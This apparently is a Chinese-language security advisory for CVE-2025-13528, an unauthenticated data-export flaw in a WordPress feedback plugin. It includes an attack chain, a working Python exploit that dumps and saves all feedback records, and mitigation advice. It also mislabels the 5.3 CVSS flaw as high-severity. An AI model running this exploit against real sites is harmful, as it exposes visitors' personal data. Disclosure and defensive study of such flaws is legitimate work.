CVE-2025-13528 WordPress Feedback Modal插件未授权数据导出漏洞

漏洞信息

漏洞编号

CVE-2025-13528

漏洞类型

缺少授权/不安全的直接对象引用

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Feedback Modal for Website (WordPress插件)

漏洞概述

CVE-2025-13528是WordPress插件"Feedback Modal for Website"中的一个高危安全漏洞。该插件用于在网站上显示反馈模态框，收集用户反馈信息。漏洞根源在于插件的导出功能缺少适当的权限检查机制。具体来说，插件的handle_export函数未验证用户身份或权限，允许任何未认证用户通过export_data参数访问敏感的反馈数据。攻击者无需任何凭据，即可利用此漏洞批量导出网站收集的所有用户反馈内容，包括可能包含的个人信息、联系方式、问题描述等敏感数据。由于CVSS评分为5.3（中等），且攻击复杂度低、无需认证，该漏洞在实际环境中容易被利用，对用户数据隐私构成实质性威胁。漏洞由Wordfence安全团队于2025年12月5日披露。

技术细节

该漏洞属于OWASP Top 10中的"A01:2021-Broken Access Control"类别。插件在inc/admin/main.php文件的第1011行实现了handle_export函数，该函数负责处理反馈数据的导出操作。问题出在函数缺少current_user_can()或同等权限验证机制。正常情况下，WordPress管理员功能应该使用wp_verify_nonce()验证CSRF令牌，并使用current_user_can('manage_options')检查用户权限，但handle_export函数直接处理请求参数而未进行任何验证。攻击者只需构造带有export_data参数的HTTP POST请求，指定输出格式（CSV或JSON），即可触发数据导出。export_data参数可能接受file_type、format等子参数来控制导出格式。由于所有反馈数据都存储在WordPress数据库中，攻击成功后将获得完整的反馈数据集，包括提交时间、用户IP地址、反馈内容等敏感字段。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站是否使用Feedback Modal for Website插件，可通过网站源码、插件目录特征或Wappalyzer等工具检测

STEP 2

步骤2: 构造恶意请求

攻击者构造HTTP POST请求到wp-admin/admin-post.php，设置action为handle_export，export_data为1，指定file_type为csv或json

STEP 3

步骤3: 发送未认证请求

攻击者直接发送请求，无需携带任何认证cookie或令牌，因为插件未验证用户权限

STEP 4

步骤4: 接收导出数据

服务器端handle_export函数直接执行数据库查询，检索所有反馈记录并生成CSV/JSON文件返回给攻击者

STEP 5

步骤5: 数据利用

攻击者获取包含用户敏感信息的反馈数据后，可用于进一步攻击、身份盗窃或出售给第三方

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-13528 PoC - Unauthenticated Feedback Data Export
# Affected: Feedback Modal for Website plugin <= 1.0.1

import requests
import sys

TARGET_URL = "https://example.com"  # Replace with target URL

def exploit_export_csv():
    """Export all feedback data in CSV format without authentication"""
    endpoint = f"{TARGET_URL}/wp-admin/admin-post.php"
    
    # Prepare the export request - no authentication required
    data = {
        'action': 'handle_export',
        'export_data': '1',
        'file_type': 'csv'
    }
    
    print("[*] Sending exploit request for CSV export...")
    print(f"[*] Target: {endpoint}")
    
    try:
        response = requests.post(endpoint, data=data, timeout=30)
        print(f"[*] Status Code: {response.status_code}")
        
        if response.status_code == 200:
            # Check if we received CSV data
            if 'text/csv' in response.headers.get('Content-Type', '') or ',,' in response.text:
                print("[+] SUCCESS: Feedback data exported!")
                print(f"[+] Response preview: {response.text[:500]}")
                
                # Save to file
                with open('exported_feedback.csv', 'w') as f:
                    f.write(response.text)
                print("[+] Data saved to exported_feedback.csv")
                return True
        
        print("[-] Export attempt completed, check response manually")
        return False
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

def exploit_export_json():
    """Export all feedback data in JSON format without authentication"""
    endpoint = f"{TARGET_URL}/wp-admin/admin-post.php"
    
    data = {
        'action': 'handle_export',
        'export_data': '1',
        'file_type': 'json'
    }
    
    print("[*] Sending exploit request for JSON export...")
    
    try:
        response = requests.post(endpoint, data=data, timeout=30)
        print(f"[*] Status Code: {response.status_code}")
        
        if response.status_code == 200:
            print("[+] SUCCESS: JSON feedback data exported!")
            with open('exported_feedback.json', 'w') as f:
                f.write(response.text)
            print("[+] Data saved to exported_feedback.json")
            return True
        
        return False
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-13528 Exploit - Feedback Modal for Website")
    print("=" * 60)
    
    exploit_export_csv()
    print("\n" + "=" * 60)

影响范围

Feedback Modal for Website <= 1.0.1

防御指南

临时缓解措施

由于该漏洞允许未认证用户导出所有反馈数据，在无法立即升级的情况下，建议临时禁用或删除Feedback Modal for Website插件，同时检查是否有异常的数据导出活动日志。如必须使用该插件，可通过Web应用防火墙（WAF）规则临时拦截包含'export_data'参数的请求，但这是临时缓解措施，不能替代升级修复。